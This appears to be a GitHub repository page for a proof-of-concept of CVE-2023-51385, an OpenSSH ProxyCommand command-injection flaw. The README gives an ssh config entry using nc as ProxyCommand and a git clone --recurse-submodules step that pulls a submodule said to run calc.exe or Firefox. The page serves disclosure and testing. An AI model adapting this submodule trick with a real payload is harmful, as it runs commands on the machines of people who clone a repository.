Skip to content

CVE-2023-51385;OpenSSH ProxyCommand RCE;OpenSSH <9.6 命令注入漏洞poc

Notifications You must be signed in to change notification settings

WLaoDuo/CVE-2023-51385_poc-test

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

39 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

CVE-2023-51385 poc

OpenSSH ProxyCommand RCE poc

OpenSSH <9.6 命令注入漏洞poc 中文

1.vim ~/.ssh/config or edit C:/Users/username/.ssh/config on windows system

host *.example.com
  ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p

2. git clone https://github.com/WLaoDuo/CVE-2023-51385_poc-test --recurse-submodules

A submodule which would exploit this vulnerability to pop a firefox on kali or calc.exe on windows.

thanks to https://github.com/vin01/poc-proxycommand-vulnerable-v2

About

CVE-2023-51385;OpenSSH ProxyCommand RCE;OpenSSH <9.6 命令注入漏洞poc

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published